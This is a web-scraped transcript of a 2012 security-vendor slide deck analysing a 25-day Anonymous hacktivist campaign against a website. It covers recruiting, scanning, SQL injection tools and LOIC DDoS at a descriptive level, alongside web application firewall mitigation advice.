Presentation is loading. Please wait.

Presentation is loading. Please wait.

The Anatomy and Security of an Anonymous Operation

Published byLesley Little Modified over 9 years ago

Similar presentations

Presentation on theme: "The Anatomy and Security of an Anonymous Operation"— Presentation transcript:

1 The Anatomy and Security of an Anonymous Operation
July 2012 Terry Ray – VP WW Security Engineering

2 What is Anonymous? Reality Perception
“[Anonymous is] the first Internet-based superconsciousness.” —Chris Landers. Baltimore City Paper, April 2, 2008 Hacktivists fighting for moral causes. The 99%. Reality “Anonymous is an umbrella for anyone to hack anything for any reason.” —New York Times, 27 Feb 2012 Targets include porn sites, Mexican drug lords, Sony, government agencies, banks, churches, law enforcement and Vladimir Putin. Anyone can be a target.

3 The Plot Attack took place in 2011 over a 25 day period.
Anonymous was on a deadline to breach and disrupt a website, a proactive attempt at hacktivism. 10-15 skilled hackers. Several hundred to thousands supporters.

4 How They Attack: The Anonymous Attack Anatomy

5 Anonymous Attack on Customer Site Web Application Protection Use Case
SecureSphere Web Application Firewall Presentation Anonymous Attack on Customer Site Web Application Protection Use Case May 21, 2007 PHASE I SecureSphere stopped all phases of attack Technical Attack Scanners such as Nikto Phase III PHASE II Business Logic Attack The first use case we are going to look at is Web application protection and since it is an important use case, we are going to examine different Web application threats and how SecureSphere mitigated them. The first one is a multinational company that was attacked by the hacktivist group Anonymous. Imperva witnessed the assault which occurred over a period of 25 days. It started with recruiting activities and application probes by scanners such as Nikto and Acunetix. These scans tried to uncover Web vulnerabilities. During the second phase, Anonymous turned to attack tools like the Havij SQL injection tool to attempt to hack the site. They also used anonymity services like anonymous proxies to disguise their identity. During both of these phases, Imperva blocked all attacks. When the technical attacks failed, Anonymous turned to DDoS attacks to attempt to bring down the Website. They used LOIC, or Low Orbit Ion Cannon, and a new mobile version of the attack tool to disrupt application access. Traffic spiked, but SecureSphere was able to mitigate this Web-based DDoS attack. Technical Attack Havij SQL injection tool LOIC application Imperva

6 On the Offense Skilled hackers—This group, around 10 to 15 individuals per campaign, have genuine hacking experience and are quite savvy. Broad use of anonymizing services (aProxy & TOR). Nontechnical—This group can be quite large, ranging from a few dozen to a few hundred volunteers. Directed by the skilled hackers, their role is primarily to conduct DDoS attacks by either downloading and using special software or visiting websites designed to flood victims with excessive traffic.

7 On the Defense Deployment line was network firewall, IDS, WAF, web servers, network anti-DOS and anti-virus. Imperva WAF SecureSphere WAF version 8.5 inline, high availability ThreatRadar reputation (IP Reputation) SSL wasn’t used, the whole website was in HTTP

8 1 Recruiting and Communications

9 Step 1A: An “Inspirational” Video

10 Step 1B: Social Media Helps Recruit

11 Setting Up An Early Warning System

12 Example

13 2 Recon and Application Attack
“Avoid strength, attack weakness: Striking where the enemy is most vulnerable.” —Sun Tzu

14 Step 1A: Finding Vulnerabilities
Tool #1: Vulnerability Scanners Purpose: Rapidly find application vulnerabilities. Cost: $0-$1000 per license. The specific tools: Acunetix (named a “Visionary” in a Gartner 2011 MQ) Nikto (open source)

15 Hacking Tools Tool #2: Havij Purpose: Developed in Iran
Automated SQL injection and data harvesting tool. Solely developed to take data transacted by applications Developed in Iran

16 Vulnerabilities of Interest
DT SQLi XSS

17 Comparing to Lulzsec Activity
Lulzsec was/is a team of hackers focused on breaking applications and databases. ‘New’ Lulzsec taking credit for recent attacks. Militarysingles.com. Our observations have a striking similarity to the attacks employed by Lulzsec during their campaign. Lulzsec used: SQL Injection, Cross-site Scripting and Remote File Inclusion (RFI/LFI). RFI index.php Additionally, the ADC found that 29 percent of the attack events originated from the 10 most active attack sources. While filtering based on geography is far from reliable, sorting traffic based on reputation is viable. Even though the identity of the host that initiated an attack is not necessarily indicative of the identity of the attacker that controls it, we have investigated the geographic distribution of the attack-initiating hosts as determined by their IP addresses.For all attack types the attackers were spread around the world but most of the attacks (both in absolute numbers and counting the distinct hosts initiating the attacks) were from the United States. A significant portion of SQL Injection attacks we observed coming from a relatively small number of Chinese hosts (see Figure 3). The leading source countries were rather consistent across all attack types. The average ratio of attacks to attacking hosts is about 10:1 for RFI, 25:1 for SQL injection and 40:1 for DT.

18 Lulzsec Activity Samples
1 infected server ≈ 3000 bot infected PC power 8000 infected servers ≈ 24 million bot infected PC power Additionally, the ADC found that 29 percent of the attack events originated from the 10 most active attack sources. While filtering based on geography is far from reliable, sorting traffic based on reputation is viable. Even though the identity of the host that initiated an attack is not necessarily indicative of the identity of the attacker that controls it, we have investigated the geographic distribution of the attack-initiating hosts as determined by their IP addresses.For all attack types the attackers were spread around the world but most of the attacks (both in absolute numbers and counting the distinct hosts initiating the attacks) were from the United States. A significant portion of SQL Injection attacks we observed coming from a relatively small number of Chinese hosts (see Figure 3). The leading source countries were rather consistent across all attack types. The average ratio of attacks to attacking hosts is about 10:1 for RFI, 25:1 for SQL injection and 40:1 for DT.

19 Automation is Prevailing
In one hacker forum, it was boasted that one hacker had found 5012 websites vulnerable to SQLi through automation tools. Note: Due to automation, hackers can be effective in small groups – i.e. Lulzsec. Automation also means that attacks are equal opportunity offenders. They don’t discriminate between well-known and unknown sites. Most notably, the ADC found that attack automation is prevailing. Modern botnets scan and probe the Web seeking to exploit vulnerabilities and extract valuable data, conduct brute force password attacks, disseminate spam, distribute malware, and manipulate search engine results. These botnets operate with the same comprehensiveness and efficiency used by Google spiders to index websites. As the recent Lulzsec episode highlighted, hackers can be effective in small groups. Further, automation also means that attacks are equal opportunity offenders; they do not discriminate between well-known and unknown sites or enterprise-level and non-profit organizations. Automation is prevailing. According to the study, websites experience an average of 27 attacks per hour or about once every two minutes. However, 27 attacks per hour is only an average. When sites come under automated attack, the target can experience up to 25,000 attacks per hour or 7 per second.

20 US is the ‘visible’ source of most attacks
Additionally, the ADC found that 29 percent of the attack events originated from the 10 most active attack sources. While filtering based on geography is far from reliable, sorting traffic based on reputation is viable. Even though the identity of the host that initiated an attack is not necessarily indicative of the identity of the attacker that controls it, we have investigated the geographic distribution of the attack-initiating hosts as determined by their IP addresses.For all attack types the attackers were spread around the world but most of the attacks (both in absolute numbers and counting the distinct hosts initiating the attacks) were from the United States. A significant portion of SQL Injection attacks we observed coming from a relatively small number of Chinese hosts (see Figure 3). The leading source countries were rather consistent across all attack types. The average ratio of attacks to attacking hosts is about 10:1 for RFI, 25:1 for SQL injection and 40:1 for DT. During the Anonymous attack 74% of the technical attack traffic originated from anonymizing services and was detected by IP reputation.

21 Stop Automated Attacks
Mitigation: AppSec 101 Code Fixing Dork Yourself Blacklist + IP Rep WAF WAF + VA Stop Automated Attacks

22 3 Application DDoS

23 LOIC Facts Low-Orbit Ion Canon (LOIC) Purpose:
DDoS Mobile and Javascript variations Other variations – HOIC, GOIC, RefRef LOIC downloads 2011: 381,976 2012 (through May 10): 374,340 June 2012= ~98% of 2011’s downloads!

24 Anonymous and LOIC in Action
Transactions per Second LOIC in Action Average Site Traffic

25 Application DDoS The effectiveness of RefRef is due to the fact that it exploits a vulnerability in a widespread SQL service. The flaw is apparently known but not widely patched yet. The tool's creators don't expect their attacks to work on a high-profile target more than a couple of times before being blocked, but they don't believe organizations will rush to patch this flaw en masse before being hit. —The Hacker News, July 30, 2011

26 But That Much Sophistication Isn’t Always Required

27 But That Much Sophistication Isn’t Always Required
Meet your target URL

28 4 Non-Mitigations

29 I have IPS and NGFW, am I safe?
IPS and NGFWs do not prevent web application attacks. Don’t confuse “application aware marketing” with Web Application Security. WAFs at a minimum must include the following to protect web applications: Web-App Profile Web-App Signatures Web-App Protocol Security Web-App DDOS Security Web-App Cookie Protection Anonymous Proxy/TOR IP Security HTTPS (SSL) visibility Security Policy Correlation

30 I have IPS and NGFW, am I safe?
IPS and NGFWs do not prevent web application attacks. Don’t confuse “application aware marketing” with Web Application Security. However, IPS and NGFWs at best only partially support the items in Red: Web-App Profile Web-App Signatures Web-App Protocol Security Web-App DDOS Security Web-App Cookie Protection Anonymous Proxy/TOR IP Security HTTPS (SSL) visibility Security Policy Correlation

31 Recent attacker targets….
Yahoo Voice Linked In Last.fm Formspring eHarmony US Department of Justice US Copyright Office FBI MPAA Warner Brothers RIAA HADOPI BMI SOHH Office of the AU Prime Minister AU House of Parliament AU Department of Communications Swiss bank PostFinance Egyptian Government Itau Banco de Brazil US Senate Caixa Church of Scientology Muslim Brotherhood Zappos.com MilitarySingles.com Amazon Austria Federal Chancellor HBGary Federal Mexican Interior Ministry Mexican Senate Mexican Chamber of Deputies Irish Department of Justice Irish Department of Finance Greek Department of Justice Egyptian National Democratic Party Spanish Police Orlando Chamber of Commerce Catholic Diocese of Orlando Bay Area Rapid Transit PayPal Mastercard Visa How many of these organizations have AV, IPS and Next Generations Firewalls? Why are the attacks successful when these technologies claim to prevent them?

32 5 Demo

Download ppt "The Anatomy and Security of an Anonymous Operation"

Similar presentations

Approaches to meeting the PCI Vulnerability Management and Penetration Testing Requirements Clay Keller.

Approaches to meeting the PCI Vulnerability Management and Penetration Testing Requirements Clay Keller.
George Tubin Senior Analyst Consumer Banking © 2005 The Tower Group, Inc. May not be reproduced by any means without express permission. All rights reserved.

George Tubin Senior Analyst Consumer Banking © 2005 The Tower Group, Inc. May not be reproduced by any means without express permission. All rights reserved.
© 2015 Imperva, Inc. All rights reserved. Collateral DDoS Ido Leibovich, ADC.

© 2015 Imperva, Inc. All rights reserved. Collateral DDoS Ido Leibovich, ADC.
7 Effective Habits when using the Internet Philip O’Kane 1.

7 Effective Habits when using the Internet Philip O’Kane 1.
STOP.THINK.CONNECT™ NATIONAL CYBERSECURITY AWARENESS CAMPAIGN SMALL BUSINESS PRESENTATION.

STOP.THINK.CONNECT™ NATIONAL CYBERSECURITY AWARENESS CAMPAIGN SMALL BUSINESS PRESENTATION.
Information Security Overview in the Israeli E-Government April 2010 Ministry of Finance – Accountant General E-government Division.

Information Security Overview in the Israeli E-Government April 2010 Ministry of Finance – Accountant General E-government Division.
Radware DoS / DDoS Attack Mitigation System Orly Sorokin January 2013.

Radware DoS / DDoS Attack Mitigation System Orly Sorokin January 2013.
Anatomy of an Web Application Attack

Anatomy of an Web Application Attack
Barracuda Web Application Firewall

Barracuda Web Application Firewall
Spotting Web Vulnerabilities (from the eyes of an Script Kiddie)

Spotting Web Vulnerabilities (from the eyes of an Script Kiddie)
January 14, 2010 Introduction to Ethical Hacking and Network Defense MIS 4600 - © Abdou Illia.

January 14, 2010 Introduction to Ethical Hacking and Network Defense MIS © Abdou Illia.
Jak zwiększyć bezpieczeństwo i wysoką dostępność aplikacji wg

Jak zwiększyć bezpieczeństwo i wysoką dostępność aplikacji wg
Internet Quarantine: Requirements for Containing Self-Propagating Code David Moore et. al. University of California, San Diego.

Internet Quarantine: Requirements for Containing Self-Propagating Code David Moore et. al. University of California, San Diego.
Internet Security PA Turnpike Commission. Internet Security Practices, rule #1: Be distrustful when using the Internet!

Internet Security PA Turnpike Commission. Internet Security Practices, rule #1: Be distrustful when using the Internet!
Lecture 16 Page 1 CS 236 Online Cross-Site Scripting XSS Many sites allow users to upload information –Blogs, photo sharing, Facebook, etc. –Which gets.

Lecture 16 Page 1 CS 236 Online Cross-Site Scripting XSS Many sites allow users to upload information –Blogs, photo sharing, Facebook, etc. –Which gets.
Copyright © The OWASP Foundation Permission is granted to copy, distribute and/or modify this document under the terms of the OWASP License. The OWASP.

Copyright © The OWASP Foundation Permission is granted to copy, distribute and/or modify this document under the terms of the OWASP License. The OWASP.
SiteLock Internet Security: Big Threats for Small Business.

SiteLock Internet Security: Big Threats for Small Business.
Presenter Deddie Tjahjono.  Introduction  Website Application Layer  Why Web Application Security  Web Apps Security Scanner  About  Feature  How.

Presenter Deddie Tjahjono.  Introduction  Website Application Layer  Why Web Application Security  Web Apps Security Scanner  About  Feature  How.
Web Application Security Assessment and Vulnerability Assessment.

Web Application Security Assessment and Vulnerability Assessment.
Web Application Testing with AppScan Terry Labach.

Web Application Testing with AppScan Terry Labach.

Similar presentations

Ads by Google